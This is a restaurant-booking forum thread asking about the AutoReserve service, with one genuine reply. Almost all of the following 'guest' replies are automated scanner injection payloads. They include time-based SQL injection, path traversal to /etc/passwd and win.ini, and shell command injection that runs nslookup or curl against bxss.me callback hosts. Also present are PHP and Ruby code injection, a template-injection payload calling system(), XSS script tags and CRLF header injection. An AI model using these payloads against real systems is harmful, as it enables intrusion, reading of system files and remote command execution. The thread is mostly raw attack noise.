Tokyo Table Trip

Logo discover 8a060a5a25d78a2d81322b0a16884eb1c05869ebadb772a16350e198984e5cfb

BACK

AutoReserve

thetokyogourmet

Has anyone used AutoReserve?

Add photos

8 Comments


I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap

1680162259 Reply
Add photos

re: guest

DX84Bh1d

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

1*

1696996696

re: guest

-1 OR 2+46-46-1=0+0+0+1

1696996697

re: guest

-1 OR 3+46-46-1=0+0+0+1

1696996697

re: guest

if(now()=sysdate(),sleep(15),0)

1696996704

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1696996713

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1696996723

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1696996729

re: guest

-1; waitfor delay '0:0:15' --

1696996737

re: guest

-1); waitfor delay '0:0:15' --

1696996746

re: guest

1 waitfor delay '0:0:15' --

1696996753

re: guest

te5fClNN'; waitfor delay '0:0:15' --

1696996762

re: guest

-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))--

1696996770

re: guest

-5) OR 902=(SELECT 902 FROM PG_SLEEP(15))--

1696996778

re: guest

-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))--

1696996787

re: guest

eJrFMpVi' OR 625=(SELECT 625 FROM PG_SLEEP(15))--

1696996801

re: guest

kDJWta2d') OR 591=(SELECT 591 FROM PG_SLEEP(15))--

1696996812

re: guest

joFJzdK1')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--

1696996822

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1696996834

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1696996842

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1696996853

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1696996862

re: guest

1'"

1696996862

re: guest

@@iKFXC

1696996863

re: guest

MCx7nZOK

1697002508

re: guest

1*

1697002508

re: guest

1*

1697002509

re: guest

1*

1697002509

re: guest

1*

1697002509

re: guest

-1 OR 2+362-362-1=0+0+0+1

1697002509

re: guest

-1 OR 3+362-362-1=0+0+0+1

1697002510

re: guest

if(now()=sysdate(),sleep(15),0)

1697002514

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002518

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002523

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002528

re: guest

-1; waitfor delay '0:0:15' --

1697002533

re: guest

-1); waitfor delay '0:0:15' --

1697002537

re: guest

1 waitfor delay '0:0:15' --

1697002541

re: guest

6GV3HVSP'; waitfor delay '0:0:15' --

1697002546

re: guest

-5 OR 314=(SELECT 314 FROM PG_SLEEP(15))--

1697002551

re: guest

-5) OR 621=(SELECT 621 FROM PG_SLEEP(15))--

1697002556

re: guest

-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--

1697002561

re: guest

RLm86hqb' OR 606=(SELECT 606 FROM PG_SLEEP(15))--

1697002565

re: guest

XuYYZPBs') OR 972=(SELECT 972 FROM PG_SLEEP(15))--

1697002571

re: guest

p73KzAKf')) OR 83=(SELECT 83 FROM PG_SLEEP(15))--

1697002575

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002579

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002583

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002587

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002592

re: guest

1'"

1697002593

re: guest

@@HFO3k

1697002593

re: guest

1ZzpmqoVO

1727140931

re: guest

response.write(9708793*9061780)

1727140992

re: guest

%0abcc:074625.67-13697.67.2aebf.19990.2@bxss.me

1727140992

re: guest

'+response.write(9708793*9061780)+'

1727140992

re: guest

to@example.com>%0d%0abcc:074625.67-13698.67.2aebf.19990.2@bxss.me

1727140993

re: guest

"+response.write(9708793*9061780)+"

1727140993

re: guest

../../../../../../../../../../../../../../etc/passwd

1727140994

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727140994

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727140995

re: guest

file:///etc/passwd

1727140995

re: guest

../../../../../../../../../../../../../../../proc/version

1727140996

re: guest

${9999063+10000268}

1727140996

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140997

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727140997

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140998

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140998

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140999

re: guest

/etc/passwd

1727140999

re: guest

%2fetc%2fpasswd

1727141000

re: guest

echo rccnms$()\ uwogns\nz^xyu||a #' &echo rccnms$()\ uwogns\nz^xyu||a #|" &echo rccnms$()\ uwogns\nz^xyu||a #

1727141000

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141000

re: guest

&echo intfrq$()\ rizrcb\nz^xyu||a #' &echo intfrq$()\ rizrcb\nz^xyu||a #|" &echo intfrq$()\ rizrcb\nz^xyu||a #

1727141001

re: guest

)

1727141001

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141001

re: guest

|echo czitmb$()\ nadxmr\nz^xyu||a #' |echo czitmb$()\ nadxmr\nz^xyu||a #|" |echo czitmb$()\ nadxmr\nz^xyu||a #

1727141001

re: guest

!(()&&!|*|*|

1727141001

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141002

re: guest

(nslookup hitgkbgqqpsrl75ca0.bxss.me||perl -e "gethostbyname('hitgkbgqqpsrl75ca0.bxss.me')")

1727141002

re: guest

^(#$!@#$)(()))******

1727141002

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141002

re: guest

$(nslookup hithieweqcmfa36572.bxss.me||perl -e "gethostbyname('hithieweqcmfa36572.bxss.me')")

1727141002

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141003

re: guest

&nslookup hitlxnuoeutqh0f9dd.bxss.me&'\"`0&nslookup hitlxnuoeutqh0f9dd.bxss.me&`'

1727141003

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141003

re: guest

&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&'\"`0&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&`'

1727141003

re: guest

file:///etc/passwd

1727141004

re: guest

|(nslookup hithhwerdysvdb7c23.bxss.me||perl -e "gethostbyname('hithhwerdysvdb7c23.bxss.me')")

1727141004

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727141005

re: guest

`(nslookup hitvvigqfpdxx4740e.bxss.me||perl -e "gethostbyname('hitvvigqfpdxx4740e.bxss.me')")`

1727141005

re: guest

'.gethostbyname(lc('hitek'.'zihygqpya2f48.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(73).chr(108).chr(87).'

1727141005

re: guest

/WEB-INF/web.xml

1727141005

re: guest

;(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")|(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")&(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")

1727141005

re: guest

".gethostbyname(lc("hitiz"."mmjqlwdtcd938.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(71).chr(101).chr(74)."

1727141005

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141005

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727141006

1727141006

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727141006

1727141006

re: guest

/../../../../../../../../../../boot.ini

1727141007

re: guest

/etc/shells

1727141007

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141007

re: guest

c:/windows/win.ini

1727141007

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727141008

re: guest

bxss.me

1727141008

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141009

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141010

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141010

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141011

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141011

re: guest

WEB-INF/web.xml

1727141012

re: guest

WEB-INF\web.xml

1727141012

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141013

re: guest

';print(md5(31337));$a='

1727141014

re: guest

";print(md5(31337));$a="

1727141014

re: guest

${@print(md5(31337))}

1727141015

re: guest

${@print(md5(31337))}\

1727141016

re: guest

'.print(md5(31337)).'

1727141017

1727141028

re: guest

"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(115).concat(72)+(require"socket"
Socket.gethostbyname("hitji"+"eipgjydm2a000.bxss.me.")[3].to_s)+"

1727141029

re: guest

bxss.me/t/xss.html?%00

1727141029

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141029

re: guest

'+'A'.concat(70-3).concat(22*4).concat(119).concat(73).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitix'+'bntdfifxb3444.bxss.me.')[3].to_s)+'

1727141030

re: guest

'"

1727141031

re: guest

<!--

1727141031

re: guest

1

1727141389

re: guest

1

1727141401

re: guest

-1 OR 2+147-147-1=0+0+0+1 --

1727141402

re: guest

-1 OR 3+147-147-1=0+0+0+1 --

1727141403

re: guest

-1 OR 2+677-677-1=0+0+0+1

1727141403

re: guest

-1 OR 3+677-677-1=0+0+0+1

1727141404

re: guest

-1' OR 2+404-404-1=0+0+0+1 --

1727141405

re: guest

-1' OR 3+404-404-1=0+0+0+1 --

1727141405

re: guest

-1' OR 2+473-473-1=0+0+0+1 or 'a6wdc0Hc'='

1727141406

re: guest

-1' OR 3+473-473-1=0+0+0+1 or 'a6wdc0Hc'='

1727141406

re: guest

-1" OR 2+617-617-1=0+0+0+1 --

1727141407

re: guest

-1" OR 3+617-617-1=0+0+0+1 --

1727141407

re: guest

if(now()=sysdate(),sleep(15),0)

1727141420

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141433

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141463

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141496

re: guest

-1; waitfor delay '0:0:15' --

1727141507

re: guest

-1); waitfor delay '0:0:15' --

1727141515

re: guest

1 waitfor delay '0:0:15' --

1727141523

re: guest

TXpjhF01'; waitfor delay '0:0:15' --

1727141530

re: guest

-5 OR 76=(SELECT 76 FROM PG_SLEEP(15))--

1727141538

re: guest

-5) OR 713=(SELECT 713 FROM PG_SLEEP(15))--

1727141546

re: guest

-1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--

1727141554

re: guest

hALSadD2' OR 383=(SELECT 383 FROM PG_SLEEP(15))--

1727141563

re: guest

eICRPnH9') OR 728=(SELECT 728 FROM PG_SLEEP(15))--

1727141577

re: guest

Mf0MmkiG')) OR 382=(SELECT 382 FROM PG_SLEEP(15))--

1727141590

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141601

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141612

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727141649

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727141658

re: guest

1'"

1727141659

re: guest

@@fN9Ro

1727141661

re: guest

1

1727383005

re: guest

1

1727383015

re: guest

1

1727383015

re: guest

1

1727383563

re: guest

1

1727383564

re: guest

1

1727383564

re: guest

1Z8ONZB7M0

1753894412

re: guest

response.write(9508055*9747091)

1753894419

re: guest

'+response.write(9508055*9747091)+'

1753894421

re: guest


<esi:include src="http://bxss.me/rpb.png"/>

1753894421

re: guest

"+response.write(9508055*9747091)+"

1753894423

re: guest

${9999126+9999197}

1753894423

re: guest

redirtest.acx

1753894430

re: guest

../../../../../../../../../../../../../../etc/passwd

1753894432

re: guest

)

1753894433

re: guest

../../../../../../../../../../../../../../windows/win.ini

1753894434

re: guest

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894434

re: guest

!(()&&!|*|*|

1753894434

re: guest

file:///etc/passwd

1753894435

re: guest

^(#$!@#$)(()))******

1753894436

re: guest

../

1753894438

re: guest

'.gethostbyname(lc('hitmt'.'cwfaymgab1a15.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(112).chr(83).'

1753894439

re: guest

".gethostbyname(lc("hitho"."cvzggiew01fb2.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(69).chr(110).chr(69)."

1753894441

re: guest

gethostbyname(lc('hitsb'.'mhlcjetw98062.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(82).chr(98).chr(69)

1753894443

1753894444

re: guest

bxss.me/t/xss.html?%00

1753894445

re: guest

'"

1753894450

re: guest

"+"A".concat(70-3).concat(22*4).concat(110).concat(88).concat(104).concat(78)+(require"socket"
Socket.gethostbyname("hitta"+"xravxzlt27f71.bxss.me.")[3].to_s)+"

1753894451

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894451

re: guest

replies

1753894452

re: guest

<!--

1753894452

re: guest

'+'A'.concat(70-3).concat(22*4).concat(112).concat(65).concat(106).concat(80)+(require'socket'
Socket.gethostbyname('hituj'+'atjyvzjrc384e.bxss.me.')[3].to_s)+'

1753894453

re: guest

/etc/shells

1753894453

re: guest

replies

1753894454

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894454

re: guest

../../../../../../../../../../../../../../etc/shells

1753894456

re: guest

'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(114).concat(90)+(require'socket'
Socket.gethostbyname('hitqe'+'tptpptaz9ca7d.bxss.me.')[3].to_s)

1753894456

re: guest

replies/.

1753894456

re: guest

';print(md5(31337));$a='

1753894456

re: guest

c:/windows/win.ini

1753894457

re: guest

";print(md5(31337));$a="

1753894458

re: guest

bxss.me

1753894459

re: guest

${@print(md5(31337))}

1753894460

re: guest


'"()&%<zzz><ScRiPt >lyuH(9850)</ScRiPt>

1753894460

1753894461

re: guest

${@print(md5(31337))}\

1753894461

re: guest

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitdkavtkevny73753.bxss.me")}}

1753894462

1753894463

re: guest

'.print(md5(31337)).'

1753894463

re: guest

'"()

1753894463

re: guest

echo wrqhxd$()\ phkzcu\nz^xyu||a #' &echo wrqhxd$()\ phkzcu\nz^xyu||a #|" &echo wrqhxd$()\ phkzcu\nz^xyu||a #

1753894464

re: guest

'"()&%<zzz><ScRiPt >lyuH(9850)</ScRiPt>

1753894464

re: guest


'&&sleep(27*1000)*yjtppg&&'

1753894465

re: guest

&echo fiiley$()\ mvpnpn\nz^xyu||a #' &echo fiiley$()\ mvpnpn\nz^xyu||a #|" &echo fiiley$()\ mvpnpn\nz^xyu||a #

1753894465

re: guest


9973582

1753894465

re: guest

|echo wpvlkx$()\ vgnhzn\nz^xyu||a #' |echo wpvlkx$()\ vgnhzn\nz^xyu||a #|" |echo wpvlkx$()\ vgnhzn\nz^xyu||a #

1753894466

re: guest


"&&sleep(27*1000)*pgroua&&"

1753894467

re: guest

expr 9000749700 - 955673

1753894468

re: guest


'||sleep(27*1000)*htrtfh||'

1753894468

re: guest

(nslookup -q=cname hitpjolxbugli18f79.bxss.me||curl hitpjolxbugli18f79.bxss.me))

1753894470

re: guest


"||sleep(27*1000)*lidtrp||"

1753894470

re: guest

$(nslookup -q=cname hitzuudmjjnzqfcd09.bxss.me||curl hitzuudmjjnzqfcd09.bxss.me)

1753894472

re: guest

&nslookup -q=cname hittlbzyadmpge37a7.bxss.me&'\"`0&nslookup -q=cname hittlbzyadmpge37a7.bxss.me&`'

1753894473

re: guest

&(nslookup -q=cname hitxtnowehhqmcd5e4.bxss.me||curl hitxtnowehhqmcd5e4.bxss.me)&'\"`0&(nslookup -q=cname hitxtnowehhqmcd5e4.bxss.me||curl hitxtnowehhqmcd5e4.bxss.me)&`'

1753894475

re: guest

|(nslookup -q=cname hitolbdayxqjz7d674.bxss.me||curl hitolbdayxqjz7d674.bxss.me)

1753894476

re: guest

`(nslookup -q=cname hitlnbstjvemma0593.bxss.me||curl hitlnbstjvemma0593.bxss.me)`

1753894478

re: guest

;(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)|(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)&(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)

1753894479

re: guest

|(nslookup${IFS}-q${IFS}cname${IFS}hitxluuknmbcqc208d.bxss.me||curl${IFS}hitxluuknmbcqc208d.bxss.me)

1753894481

re: guest

&(nslookup${IFS}-q${IFS}cname${IFS}hitxpvtvbglyh717c4.bxss.me||curl${IFS}hitxpvtvbglyh717c4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitxpvtvbglyh717c4.bxss.me||curl${IFS}hitxpvtvbglyh717c4.bxss.me)&`'

1753894483

re: guest


sJ3YtOeR

1753894565

re: guest


*1

1753894571

re: guest


*1

1753894573

re: guest


*1

1753894575

re: guest


*1

1753894576

re: guest

-1 OR 5*5=25 --

1753894578

re: guest

-1 OR 5*5=26 --

1753894579

re: guest

-1 OR 5*5=25

1753894580

re: guest

-1 OR 5*5=26

1753894581

re: guest


*if(now()=sysdate(),sleep(15),0)

1753894587

re: guest


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894593

re: guest


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894599

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894606

re: guest


-1; waitfor delay '0:0:15' --

1753894610

re: guest


-1); waitfor delay '0:0:15' --

1753894615

re: guest


-1 waitfor delay '0:0:15' --

1753894620

re: guest


HdojWkHj'; waitfor delay '0:0:15' --

1753894627

re: guest


-1 OR 325=(SELECT 325 FROM PG_SLEEP(15))--

1753894634

